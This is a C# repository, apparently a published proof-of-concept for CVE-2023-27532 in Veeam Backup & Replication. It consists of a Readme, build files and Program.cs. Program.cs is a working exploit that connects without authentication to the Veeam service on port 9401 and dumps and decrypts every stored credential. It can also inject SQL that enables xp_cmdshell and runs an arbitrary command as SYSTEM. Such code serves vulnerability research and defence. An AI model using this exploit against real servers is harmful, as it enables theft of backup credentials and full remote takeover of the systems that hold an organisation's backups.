├── .gitignore
├── VeeamHax1.png
├── VeeamHax2.png
├── VeeamHax3.png
├── VeeamHax_TemporaryKey.pfx
├── App.config
├── VeeamHax.sln
├── Readme.md
├── Properties
    ├── AssemblyInfo.cs
    └── app.manifest
├── VeeamHax.csproj
└── Program.cs


/.gitignore:
--------------------------------------------------------------------------------
1 | .vs/
2 | bin/
3 | obj/
4 | *.csproj.user


--------------------------------------------------------------------------------
/VeeamHax1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sfewer-r7/CVE-2023-27532/HEAD/VeeamHax1.png


--------------------------------------------------------------------------------
/VeeamHax2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sfewer-r7/CVE-2023-27532/HEAD/VeeamHax2.png


--------------------------------------------------------------------------------
/VeeamHax3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sfewer-r7/CVE-2023-27532/HEAD/VeeamHax3.png


--------------------------------------------------------------------------------
/VeeamHax_TemporaryKey.pfx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sfewer-r7/CVE-2023-27532/HEAD/VeeamHax_TemporaryKey.pfx


--------------------------------------------------------------------------------
/App.config:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <configuration>
3 |     <startup> 
4 |         <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8"/>
5 |     </startup>
6 | </configuration>
7 | 


--------------------------------------------------------------------------------
/VeeamHax.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.5.33502.453
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "VeeamHax", "VeeamHax.csproj", "{A96C7C34-5791-43CF-9F8B-8EF5B3FB6EBA}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Any CPU = Debug|Any CPU
11 | 		Release|Any CPU = Release|Any CPU
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{A96C7C34-5791-43CF-9F8B-8EF5B3FB6EBA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | 		{A96C7C34-5791-43CF-9F8B-8EF5B3FB6EBA}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | 		{A96C7C34-5791-43CF-9F8B-8EF5B3FB6EBA}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | 		{A96C7C34-5791-43CF-9F8B-8EF5B3FB6EBA}.Release|Any CPU.Build.0 = Release|Any CPU
18 | 	EndGlobalSection
19 | 	GlobalSection(SolutionProperties) = preSolution
20 | 		HideSolutionNode = FALSE
21 | 	EndGlobalSection
22 | 	GlobalSection(ExtensibilityGlobals) = postSolution
23 | 		SolutionGuid = {0C8D0B0D-BCFA-4045-9B4A-10D2C38AAA46}
24 | 	EndGlobalSection
25 | EndGlobal
26 | 


--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
 1 | # CVE-2023-27532
 2 | 
 3 | Proof of Concept code to exploit CVE-2023-27532 and either leak plaintext credentials or perform remote command execution.
 4 | 
 5 | ## Overview
 6 | 
 7 | For a detailed analysis of the vulnerability and exploitation please read the Rapid7 [AttackerKB Analysis](https://attackerkb.com/topics/ALUsuJioE5/cve-2023-27532/rapid7-analysis).
 8 | 
 9 | ## Building
10 | 
11 | Open in Visual Studio. You will need to either add or update the references to `Veeam.Backup.Common.dll`, `Veeam.Backup.Interaction.MountService.dll`, and `Veeam.Backup.Model.dll`. To make things easier, install Veeam Backup & Replication on the development machine, although this is not a hard requirement.
12 | 
13 | ## Usage
14 | 
15 | Leak the plaintext credentials from the remote server.
16 | 
17 | ```
18 | > VeeamHax.exe --target 192.168.0.100
19 | ```
20 | 
21 | ![VeeamHax1](VeeamHax1.png)
22 | 
23 | Run an arbitrary command with local system privileges on the remote server.
24 | 
25 | ```
26 | > VeeamHax.exe --target 192.168.0.100 --cmd calc.exe
27 | ```
28 | 
29 | ![VeeamHax2](VeeamHax2.png)
30 | 
31 | ![VeeamHax3](VeeamHax3.png)
32 | 
33 | ## Credits
34 | 
35 | Previous research into this vulnerability was performed by:
36 | 
37 |  * [CODE WHITE GmbH](https://twitter.com/codewhitesec/status/1633948476353519616)
38 |  * [Huntress](https://www.huntress.com/blog/veeam-backup-replication-cve-2023-27532-response)
39 |  * [Y4er](https://y4er.com/posts/cve-2023-27532-veeam-backup-replication-leaked-credentials/)
40 | 


--------------------------------------------------------------------------------
/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
 1 | using System.Reflection;
 2 | using System.Runtime.CompilerServices;
 3 | using System.Runtime.InteropServices;
 4 | 
 5 | // General Information about an assembly is controlled through the following
 6 | // set of attributes. Change these attribute values to modify the information
 7 | // associated with an assembly.
 8 | [assembly: AssemblyTitle("VeeamHax")]
 9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 | 
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components.  If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 | 
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("a96c7c34-5791-43cf-9f8b-8ef5b3fb6eba")]
24 | 
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | //      Major Version
28 | //      Minor Version
29 | //      Build Number
30 | //      Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 | 


--------------------------------------------------------------------------------
/Properties/app.manifest:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
 3 |   <assemblyIdentity version="1.0.0.0" name="MyApplication.app" />
 4 |   <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
 5 |     <security>
 6 |       <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
 7 |         <!-- UAC Manifest Options
 8 |              If you want to change the Windows User Account Control level replace the 
 9 |              requestedExecutionLevel node with one of the following.
10 | 
11 |         <requestedExecutionLevel  level="asInvoker" uiAccess="false" />
12 |         <requestedExecutionLevel  level="requireAdministrator" uiAccess="false" />
13 |         <requestedExecutionLevel  level="highestAvailable" uiAccess="false" />
14 | 
15 |             Specifying requestedExecutionLevel element will disable file and registry virtualization. 
16 |             Remove this element if your application requires this virtualization for backwards
17 |             compatibility.
18 |         -->
19 |         <requestedExecutionLevel level="asInvoker" uiAccess="false" />
20 |       </requestedPrivileges>
21 |       <applicationRequestMinimum>
22 |         <PermissionSet class="System.Security.PermissionSet" version="1" Unrestricted="true" ID="Custom" SameSite="site" />
23 |         <defaultAssemblyRequest permissionSetReference="Custom" />
24 |       </applicationRequestMinimum>
25 |     </security>
26 |   </trustInfo>
27 |   <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
28 |     <application>
29 |       <!-- A list of the Windows versions that this application has been tested on
30 |            and is designed to work with. Uncomment the appropriate elements
31 |            and Windows will automatically select the most compatible environment. -->
32 |       <!-- Windows Vista -->
33 |       <!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
34 |       <!-- Windows 7 -->
35 |       <!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
36 |       <!-- Windows 8 -->
37 |       <!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
38 |       <!-- Windows 8.1 -->
39 |       <!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
40 |       <!-- Windows 10 -->
41 |       <!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
42 |     </application>
43 |   </compatibility>
44 |   <!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
45 |        DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need 
46 |        to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should 
47 |        also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. 
48 |        
49 |        Makes the application long-path aware. See https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation -->
50 |   <!--
51 |   <application xmlns="urn:schemas-microsoft-com:asm.v3">
52 |     <windowsSettings>
53 |       <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
54 |       <longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware>
55 |     </windowsSettings>
56 |   </application>
57 |   -->
58 |   <!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
59 |   <!--
60 |   <dependency>
61 |     <dependentAssembly>
62 |       <assemblyIdentity
63 |           type="win32"
64 |           name="Microsoft.Windows.Common-Controls"
65 |           version="6.0.0.0"
66 |           processorArchitecture="*"
67 |           publicKeyToken="6595b64144ccf1df"
68 |           language="*"
69 |         />
70 |     </dependentAssembly>
71 |   </dependency>
72 |   -->
73 | </assembly>


--------------------------------------------------------------------------------
/VeeamHax.csproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
  4 |   <PropertyGroup>
  5 |     <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
  6 |     <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
  7 |     <ProjectGuid>{A96C7C34-5791-43CF-9F8B-8EF5B3FB6EBA}</ProjectGuid>
  8 |     <OutputType>Exe</OutputType>
  9 |     <RootNamespace>VeeamHax</RootNamespace>
 10 |     <AssemblyName>VeeamHax</AssemblyName>
 11 |     <TargetFrameworkVersion>v4.8</TargetFrameworkVersion>
 12 |     <FileAlignment>512</FileAlignment>
 13 |     <AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
 14 |     <Deterministic>true</Deterministic>
 15 |     <IsWebBootstrapper>false</IsWebBootstrapper>
 16 |     <TargetFrameworkProfile />
 17 |     <PublishUrl>publish\</PublishUrl>
 18 |     <Install>true</Install>
 19 |     <InstallFrom>Disk</InstallFrom>
 20 |     <UpdateEnabled>false</UpdateEnabled>
 21 |     <UpdateMode>Foreground</UpdateMode>
 22 |     <UpdateInterval>7</UpdateInterval>
 23 |     <UpdateIntervalUnits>Days</UpdateIntervalUnits>
 24 |     <UpdatePeriodically>false</UpdatePeriodically>
 25 |     <UpdateRequired>false</UpdateRequired>
 26 |     <MapFileExtensions>true</MapFileExtensions>
 27 |     <ApplicationRevision>1</ApplicationRevision>
 28 |     <ApplicationVersion>1.0.0.%2a</ApplicationVersion>
 29 |     <UseApplicationTrust>false</UseApplicationTrust>
 30 |     <PublishWizardCompleted>true</PublishWizardCompleted>
 31 |     <BootstrapperEnabled>true</BootstrapperEnabled>
 32 |   </PropertyGroup>
 33 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
 34 |     <PlatformTarget>x64</PlatformTarget>
 35 |     <DebugSymbols>true</DebugSymbols>
 36 |     <DebugType>full</DebugType>
 37 |     <Optimize>false</Optimize>
 38 |     <OutputPath>bin\Debug\</OutputPath>
 39 |     <DefineConstants>DEBUG;TRACE</DefineConstants>
 40 |     <ErrorReport>prompt</ErrorReport>
 41 |     <WarningLevel>4</WarningLevel>
 42 |   </PropertyGroup>
 43 |   <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
 44 |     <PlatformTarget>AnyCPU</PlatformTarget>
 45 |     <DebugType>pdbonly</DebugType>
 46 |     <Optimize>true</Optimize>
 47 |     <OutputPath>bin\Release\</OutputPath>
 48 |     <DefineConstants>TRACE</DefineConstants>
 49 |     <ErrorReport>prompt</ErrorReport>
 50 |     <WarningLevel>4</WarningLevel>
 51 |   </PropertyGroup>
 52 |   <PropertyGroup>
 53 |     <StartupObject>VeeamHax.Program</StartupObject>
 54 |     <LangVersion>11.0</LangVersion>
 55 |   </PropertyGroup>
 56 |   <PropertyGroup>
 57 |     <ManifestCertificateThumbprint>CB1020AB3264CD502FC01A4F8AE9CDED3FC49646</ManifestCertificateThumbprint>
 58 |   </PropertyGroup>
 59 |   <PropertyGroup>
 60 |     <ManifestKeyFile>VeeamHax_TemporaryKey.pfx</ManifestKeyFile>
 61 |   </PropertyGroup>
 62 |   <PropertyGroup>
 63 |     <GenerateManifests>true</GenerateManifests>
 64 |   </PropertyGroup>
 65 |   <PropertyGroup>
 66 |     <TargetZone>LocalIntranet</TargetZone>
 67 |   </PropertyGroup>
 68 |   <PropertyGroup>
 69 |     <ApplicationManifest>Properties\app.manifest</ApplicationManifest>
 70 |   </PropertyGroup>
 71 |   <PropertyGroup>
 72 |     <SignManifests>true</SignManifests>
 73 |   </PropertyGroup>
 74 |   <ItemGroup>
 75 |     <Reference Include="System" />
 76 |     <Reference Include="System.Core" />
 77 |     <Reference Include="System.IdentityModel" />
 78 |     <Reference Include="System.Runtime.Serialization" />
 79 |     <Reference Include="System.Security" />
 80 |     <Reference Include="System.ServiceModel" />
 81 |     <Reference Include="System.Xml.Linq" />
 82 |     <Reference Include="System.Data.DataSetExtensions" />
 83 |     <Reference Include="Microsoft.CSharp" />
 84 |     <Reference Include="System.Data" />
 85 |     <Reference Include="System.Net.Http" />
 86 |     <Reference Include="System.Xml" />
 87 |     <Reference Include="Veeam.Backup.Common, Version=11.0.0.0, Culture=neutral, PublicKeyToken=bfd684de2276783a, processorArchitecture=AMD64">
 88 |       <SpecificVersion>False</SpecificVersion>
 89 |       <HintPath>C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll</HintPath>
 90 |     </Reference>
 91 |     <Reference Include="Veeam.Backup.Interaction.MountService">
 92 |       <HintPath>C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Interaction.MountService.dll</HintPath>
 93 |     </Reference>
 94 |     <Reference Include="Veeam.Backup.Model, Version=11.0.0.0, Culture=neutral, PublicKeyToken=bfd684de2276783a, processorArchitecture=AMD64">
 95 |       <SpecificVersion>False</SpecificVersion>
 96 |       <HintPath>C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Model.dll</HintPath>
 97 |     </Reference>
 98 |   </ItemGroup>
 99 |   <ItemGroup>
100 |     <Compile Include="Program.cs" />
101 |     <Compile Include="Properties\AssemblyInfo.cs" />
102 |   </ItemGroup>
103 |   <ItemGroup>
104 |     <None Include="App.config" />
105 |     <None Include="Properties\app.manifest" />
106 |     <None Include="VeeamHax_TemporaryKey.pfx" />
107 |   </ItemGroup>
108 |   <ItemGroup>
109 |     <BootstrapperPackage Include=".NETFramework,Version=v4.7.2">
110 |       <Visible>False</Visible>
111 |       <ProductName>Microsoft .NET Framework 4.7.2 %28x86 and x64%29</ProductName>
112 |       <Install>true</Install>
113 |     </BootstrapperPackage>
114 |     <BootstrapperPackage Include="Microsoft.Net.Framework.3.5.SP1">
115 |       <Visible>False</Visible>
116 |       <ProductName>.NET Framework 3.5 SP1</ProductName>
117 |       <Install>false</Install>
118 |     </BootstrapperPackage>
119 |   </ItemGroup>
120 |   <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
121 | </Project>


--------------------------------------------------------------------------------
/Program.cs:
--------------------------------------------------------------------------------
  1 | // Proof of Concept code to exploit CVE-2023-27532 and either leak plaintext credentials or perform remote command execution.
  2 | // For a detailed analysis of the vulnerability and exploitation please read the Rapid7 AttackerKB Analysis: https://attackerkb.com/topics/ALUsuJioE5/cve-2023-27532/rapid7-analysis
  3 | using System;
  4 | using System.Collections.Generic;
  5 | using System.IO;
  6 | using System.Runtime.Serialization.Formatters.Binary;
  7 | using System.Security.Cryptography;
  8 | using System.ServiceModel;
  9 | using System.ServiceModel.Security;
 10 | using System.Text;
 11 | using Veeam.Backup.Core;
 12 | using Veeam.Backup.Interaction.MountService;
 13 | using Veeam.Backup.Model;
 14 | 
 15 | namespace VeeamHax
 16 | {
 17 |     internal class Program
 18 |     {
 19 |         static void Main(string[] args)
 20 |         {
 21 |             string host = "127.0.0.1";
 22 |             int port = 9401;
 23 |             bool verbose = false;
 24 |             string cmd = null;
 25 | 
 26 |             for (int i = 0; i < args.Length; i++)
 27 |             {
 28 |                 if (args[i] == "--target" && i + 1 < args.Length)
 29 |                     host = args[i + 1];
 30 |                 else if (args[i] == "--port" && i + 1 < args.Length)
 31 |                     port = Int32.Parse(args[i + 1]);
 32 |                 else if (args[i] == "--verbose")
 33 |                     verbose = true;
 34 |                 else if (args[i] == "--cmd" && i + 1 < args.Length)
 35 |                     cmd = args[i + 1];
 36 |                 else if (args[i] == "--help" || args[i] == "-h" || args[i] == "/?")
 37 |                 {
 38 |                     Console.WriteLine("Usage: VeeamHax.exe [--verbose] --target 192.168.0.1 --port 9401 [--cmd \"c:\\windows\\notepad.exe\"]");
 39 |                     return;
 40 |                 }
 41 |             }
 42 | 
 43 |             Console.WriteLine("Targeting {0}:{1}", host, port);
 44 | 
 45 |             NetTcpBinding binding = new NetTcpBinding();
 46 | 
 47 |             NetTcpSecurity netTcpSecurity = new NetTcpSecurity();
 48 | 
 49 |             netTcpSecurity.Mode = SecurityMode.Transport;
 50 | 
 51 |             TcpTransportSecurity tcpTransportSecurity = new TcpTransportSecurity();
 52 | 
 53 |             tcpTransportSecurity.ClientCredentialType = TcpClientCredentialType.None;
 54 | 
 55 |             netTcpSecurity.Transport = tcpTransportSecurity;
 56 | 
 57 |             binding.Security = netTcpSecurity;
 58 | 
 59 |             binding.Name = "foo";
 60 | 
 61 |             Uri uri = new Uri(String.Format("net.tcp://{0}:{1}/", host, port));
 62 | 
 63 |             EndpointAddress endpoint = new EndpointAddress(uri, EndpointIdentity.CreateDnsIdentity("Veeam Backup Server Certificate"));
 64 | 
 65 |             ChannelFactory<IRemoteInvokeService> channelFactory = new ChannelFactory<IRemoteInvokeService>(binding, endpoint);
 66 | 
 67 |             X509ServiceCertificateAuthentication x509ServiceCertificateAuthentication = new X509ServiceCertificateAuthentication();
 68 | 
 69 |             x509ServiceCertificateAuthentication.CertificateValidationMode = X509CertificateValidationMode.None;
 70 | 
 71 |             channelFactory.Credentials.ServiceCertificate.SslCertificateAuthentication = x509ServiceCertificateAuthentication;
 72 | 
 73 |             IRemoteInvokeService channel = channelFactory.CreateChannel(endpoint);
 74 | 
 75 |             if (cmd != null)
 76 |             {
 77 |                 // CommandType 1 == Text
 78 | 
 79 |                 string spec = String.Format(
 80 |                     """
 81 |     <RemoteInvokeSpec ContextSessionId="{0}">
 82 |         <DbGetDataTableRemoteInvokeSpec>
 83 |             <SqlCommand>EXEC sp_configure 'show advanced options', 1; EXEC sp_configure reconfigure; EXEC sp_configure 'xp_cmdshell', 1; EXEC sp_configure reconfigure; EXEC xp_cmdshell '{1}';</SqlCommand>
 84 |             <CommandType>1</CommandType>
 85 |         </DbGetDataTableRemoteInvokeSpec>
 86 |     </RemoteInvokeSpec>
 87 |     """,
 88 |                     Guid.NewGuid().ToString(),
 89 |                     cmd
 90 |                 );
 91 | 
 92 |                 channel.GetDataTable(ERemoteInvokeScope.DatabaseAccessor, ERemoteInvokeMethod.GetDataTable, spec);
 93 |             }
 94 |             else
 95 |             {
 96 |                 MemoryStream stream = new MemoryStream();
 97 | 
 98 |                 BinaryFormatter formatter = new BinaryFormatter();
 99 | 
100 |                 formatter.Serialize(stream, true);
101 | 
102 |                 string includeHidden = Convert.ToBase64String(stream.ToArray());
103 | 
104 |                 string parameters = String.Format(
105 |                     """
106 |     <RemoteInvokeSpec ContextSessionId="{0}" Scope="Service" Method="CredentialsDbScopeGetAllCreds">
107 |         <Params>
108 |             <Param ParamName="includeHidden" ParamValue="{1}" ParamType="System.String"></Param>
109 |         </Params>
110 |     </RemoteInvokeSpec>
111 |     """,
112 |                     Guid.NewGuid().ToString(),
113 |                     includeHidden
114 |                 );
115 | 
116 |                 string xml_result = channel.Invoke(ERemoteInvokeScope.DatabaseManager, ERemoteInvokeMethod.CredentialsDbScopeGetAllCreds, parameters);
117 | 
118 |                 if (verbose)
119 |                 {
120 |                     Console.WriteLine("Dumping raw response:");
121 |                     Console.WriteLine(xml_result);
122 |                     Console.WriteLine("");
123 |                 }
124 | 
125 |                 CCommonInvokeRetVal allCreds2 = CCommonInvokeRetVal.Deserialize(xml_result);
126 | 
127 |                 string retVal = allCreds2.GetParamAsString("retVal");
128 | 
129 |                 List<CDbCredentialsInfo> result = CProxyBinaryFormatter.Deserialize<List<CDbCredentialsInfo>>(retVal);
130 | 
131 |                 foreach (CDbCredentialsInfo info in result)
132 |                 {
133 |                     byte[] password_raw;
134 | 
135 |                     // password is now 'encrypted' using Crypt32!CryptProtectData from our local machine, which occurred during deserialization above.
136 |                     // so we can unprotect it here to get back the plaintext. 
137 |                     if (info.Credentials.IsLocalProtect)
138 |                         password_raw = ProtectedData.Unprotect(Convert.FromBase64String(info.Credentials.EncryptedPassword.Value), (byte[])null, (DataProtectionScope)1);
139 |                     else
140 |                         password_raw = ProtectedData.Unprotect(Convert.FromBase64String(info.Credentials.EncryptedPassword.Value), (byte[])null, (DataProtectionScope)0);
141 | 
142 |                     string password = Encoding.UTF8.GetString(password_raw);
143 | 
144 |                     Console.WriteLine("User: {0}\nID: {1}\nPassword: {2}\n", info.Credentials.Name, info.Id, password);
145 |                 }
146 |             }
147 |         }
148 |     }
149 | }
150 | 


--------------------------------------------------------------------------------